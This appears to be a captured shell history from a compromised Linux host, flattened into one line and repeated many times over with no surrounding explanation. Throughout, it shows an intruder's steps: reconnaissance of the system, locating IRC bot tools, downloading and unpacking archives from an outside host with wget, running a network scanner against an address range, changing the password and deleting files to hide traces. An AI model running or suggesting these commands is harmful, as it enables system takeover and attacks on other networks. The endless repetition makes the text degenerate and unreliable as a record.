gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +./bash +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz +./configure +vi +emacs +w +uname -a +/sbin/ifconfig +passwd +ls -a +ls -a +wget gavana.uv.ro/scan.tgz +ls -a +ps aux +locate mech +locate psy +wget gavana.uv.ro/ryo.tar.gz +tar xzvf ryo.tar.gz ;rm -rf ryo.tar.gz +rm -rf scripts/ +nmap +namp +nmap +cat /proc/cpuinfo +cat /etc/hosts +uname -a +w +wget gavana.uv.ro/scan.tgz +tar xzvf scan.tgz +./x 66.34 +reboot +wget gavana.uv.ro/f.tgz +tar xzvf f.tgz ;rm -rf f.tgz 